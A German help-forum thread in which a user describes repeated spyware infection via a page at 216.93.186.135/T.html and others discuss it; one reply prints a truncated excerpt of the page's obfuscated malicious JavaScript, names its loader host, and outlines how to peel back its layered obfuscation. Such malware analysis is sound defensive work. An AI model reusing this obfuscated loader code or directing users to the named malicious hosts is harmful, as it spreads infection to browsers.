Kennt jemand IP 216.93.186.135/T.html ?

Internet Internet Sicherheit
#1

Kennt jemand die IP-Adresse 216.93.186.135/T.html ?
Habe mächtige Spy- und Trojaner-Attacke gehabt und mit 1 Virenscanner Bitdefender und 2 Spy-Scannern (SpyHunterS 2.0 und XoftSpy) alles leergeräumt. Beim nächsten IN-Besuch (5min eBay) öffneten sich 2 leere IE-Fenster mit der IP 216.93.186.135/T.html . Nach dem Login in eBay passierte aber gar nichts - nur die Taskleiste zeigte Megatraffic. In einem IE-Fenster befand sich nach 1 min ein kleines graues Messagefenster „Klicken Sie hier rauf“. Nach dieser „Aktion“ war wieder alles voll mit Trojanern, BackDoors, Webrebates usw.

Weiss jemand mehr dazu und kann mir Hilfe geben ?

Danke

E. B.

#2

Hallo Eric,

Kennt jemand die IP-Adresse 216.93.186.135/T.html ?

Nein, bei mir erscheint nach Aufruf dieser Adresse http://216.93.186.135 nur:
"
Under Construction
The site you were trying to reach does not currently have a default page. It may be in the process of being upgraded.

Please try this site again later. If you still experience the problem, try contacting the Web site administrator."

Ein Ping funktioniert:
ruach@ruach:~> ping 216.93.186.135
PING 216.93.186.135 (216.93.186.135) 56(84) bytes of data.
64 bytes from 216.93.186.135: icmp_seq=1 ttl=109 time=198 ms
64 bytes from 216.93.186.135: icmp_seq=2 ttl=109 time=198 ms

… aber das ist Spielerei.

eBay) öffneten sich 2 leere IE-Fenster mit der IP

IE-Fenster befand sich nach 1 min ein kleines graues

Weiss jemand mehr dazu und kann mir Hilfe geben ?

Hast Du Dein System aktuell gehalten? Und zur Hilfe: Surfe ganz einfach nie wieder mit dem IE, sondern benutzte ihn nur noch ueber die Updatefunktion allein. IE gehoert ansonsten verboten, muesste sich eigentlich mittlerweile herum gesprochen haben.

viele gruesse, peter

http://www.mozilla.org/products/firefox/
http://www.mozilla.org/products/
http://www.opera.com/

#3

Kennt jemand die IP-Adresse 216.93.186.135/T.html ?

Nein, bei mir erscheint nach Aufruf dieser Adresse
http://216.93.186.135 nur:

Dann setz halt das t.html dahinter. Diese Seite scheint zunächst auch uninteressant, sie startet aber ein Javascript-Programm [*1] von static.windupdates.com/prompts/a373a071/a676a175.js, welches auf den ersten Blick hochinteressante Lektüre zu sein scheint. Es ist zwar unstrukturiert und verschlüsselt, dürfte sich aber recht leicht wieder entschlüsselnm lassen.

Habe ich jetzt keine Lust zu, kann aber dennoch schon ein vorläufiges amtliches Fazit ziehen: http://www.heise.de/security/artikel/49687

Gruss
Schorsch

[1] Hier noch ein kurzer Auszug aus dem Script:
var _b1I;var _y0Q;var _x3B=window;var _w2C=document;var _g4R=navigator;var _m7Q=alert;var _a5A=confirm;var _p8L=escape;var _u7P=unescape;var _p7P=setInterval;var _p9U=setTimeout;var _c6U=false;var _c6T=true;var _b2D=false;var _o0J=false;var _v8C=0;var _s7S=_q4Z(_dC(„zlq{s3“),_dC(„tq31“),false);var _t0G=new Date();var _v7I=false;var _x2P=Object();var _a0U=0;var _y7Q=_dC(„tsqtfi5“);var _p4Z=_dC(„dqf{2“);var _y2U=_dC(„ur4ajgnr2“);var _z1M=_dC(„tq3ifmqsfusz1“);var _i2Z=_dC(„Nsyjwsjy%J}uqtwjw5“);var _u1S=_dC(„Oq|knnc2“);var _n1M=_dC("|y;qk9");var _e6X=_dC(„ehMh4“);var _k0S=_dC(„wpfghkpgf2“);var _n9O=_dC(„p||xB77x}jtqk6 qvl}xli|m{6kwu7twooqvo6xpx8“);var _l6O=_dC(„kwws=22sxeolf1zlqgxsgdwhv1frp2srsbxqghu1sks3“);var _u8Z=_dC(„o{{wA66z{h{pj5~puk|wkh{lz5jvt6wyvtw{z6zw96z{lwzf}95z~m7“);var _e7W=false;var _w9Z=false;var _i8O=false;var _e8I=false;var _a1J=false;var _z1N=false;var _r5M=false;var _k9C=false;var _c6W=’’;var _r7J=’’;var _f7E=_dC(„26BE589:.DEC5.58F2.B:EB.::3FF9F7CBE71“);var _f4G=_dC(„Htgg"Ceeguu"Rnwikp2“);var _p4T=0.003;var _j2Y;var _t9O;var _q9V=_dC(„wx}rln]n“}Fbx~4v~|}4oxuux!4|}ny|4:.;L4;4jwm433wxexmg2{mrhythexiw2gsq3gef3GHX3|tm3mrwxepp2|tm4");var _h1G=_dC(„op1“);var _m2G=_dC("<?Al @jjjm88?9:>jkm=9l99>9k8lj@8@j>@>jn?=m;i9j;n9n=>;n@:i=jAk>l98?@B>>;@;9;;>>;8>=;;>>>>>:;9>:>9>:>:;A;>>:;;;:>>;8;9;9>>;9;:;4")+_p8L(_g4R.os);if(_s7S){_j2Y+=_dC("?kqfxm5");} else {_j2Y+=_dC(„Csj j|l{ry}9“);}_l6O+=_dC("@

2 Like
#4

Hallo Schorsch,

Nein, bei mir erscheint nach Aufruf dieser Adresse
http://216.93.186.135 nur:

Dann setz halt das t.html dahinter. Diese Seite scheint
zunächst auch uninteressant, sie startet aber ein

Ich habe bewusst das „t.html“ weggelassen, wollte nachsehen, ob sich dort etwas zeigt. Gemeint war schon http://216.93.186.135 und nicht „… /t.html“

Allerdings habe ich mir nicht den Sourcecode angesehen, wie eben beispielsweise von http://216.93.186.135/t.html:

self.focus();

Es ist zwar unstrukturiert und verschlüsselt, dürfte sich aber
recht leicht wieder entschlüsselnm lassen.

Wie wuerdest Du es entschluesseln bzw. wie anfangen?

Habe ich jetzt keine Lust zu, kann aber dennoch schon ein
vorläufiges amtliches Fazit ziehen:
http://www.heise.de/security/artikel/49687

Beliebter Artikel, ich weiss :wink:

viele gruesse, peter

#5

Es ist zwar unstrukturiert und verschlüsselt, dürfte sich aber
recht leicht wieder entschlüsselnm lassen.

Wie wuerdest Du es entschluesseln bzw. wie anfangen?

Zunächst strukturieren. Der Code beginnt mit einer Reihe von Variablendeklarationen, diese kannst du zunächst vom ausführbaren Code trennen und anschliessend in diesem Teil alle ; (Semikolons) durch ; ersetzen:
var _b1I;
var _y0Q;
var _x3B=window;
var _w2C=document;
var _g4R=navigator;…

Im Code selbst kannst du zunächst alle Befehlsgruppen, also schliessenden Klammerpaare {} suchen und entspr. strukturieren, anschl. wieder die einzelnen Befehl am ; trennen. Dabei darauf aufpassen, dass du in „“ gesetzte {}; nicht ersetzt.

Dummerweise sieht man schnell, dass man auf diese Weise nicht sonderlich weit kommt, da fast der gesamte ausführbare Code in Variablen deklariert wurde. Am Ende des Programmes aber findet sich die wichtigste (von mehreren) Decodierungsfunktion:

function \_dC(s){
 var i;
 var r="";
 var l=s.length-1;
 var k=s.substr(l,1);

 for (i=0;i

Dies ist nicht die Funktion, mit der das Programm startet; wie gesagt, habe ich im Moment keine Lust, selbst zu decodieren. Wenn du aber den gesamten Text zunächst wie o. a. strukturiert hast, am besten noch auf Endlospapier ausgedruckt, solltest du den Startpunkt schnell finden können.

Jetzt wird's aber etwas aufwändiger: Üblicherweise sind derart verschlüsselte Programme rekursiv codiert. D. h., wenn du die Startfunktion (auf den ersten Blick scheint's die **\_t0P()** zu sein) gefunden und einmal hast durchlaufen lassen, ist deren Ausgabe wieder ein genau so unstrukturierter Text wie der ursprüngliche, nur um ein paar Zeilen kürzer. Du hast also keine Chance, im Programm einfach Breakpoints zu setzen. Du musst die Ausgabe der Startfunktion also wieder strukturieren und die neue Startfunktion finden.

Das kann so mehrere Ebenen tief hinabgehen, dann hast du endlich die eigentliche Schadfunktion vor dir. Der intellektuelle Aufwand ist gering, es ist halt eine ziemliche Fleissarbeit. Die eigentliche Decodierungsarbeit nimmt das Programm dir ab, du musst nur die jeweilige Startfunktion minimal anpassen, da du deren Ausgabe abfangen und das Programm unmittelbar anschliessend terminieren musst.

Von einer echten Verschlüsselung kann hier also kein Rede sein, richtiger wäre es, von einer Verschleierung zu sprechen. Du musst halt einen Schleier nach dem anderen vom Gesicht dieses kleinen IE-Killers herabziehen, um seine hässliche Fratze Aug' in Aug' bewundern zu können.

Gruss
Schorsch
1 Like
#6

Hallo Schorsch,

vielen Dank fuer die Erlaeuterung! :smile:

viele gruesse, peter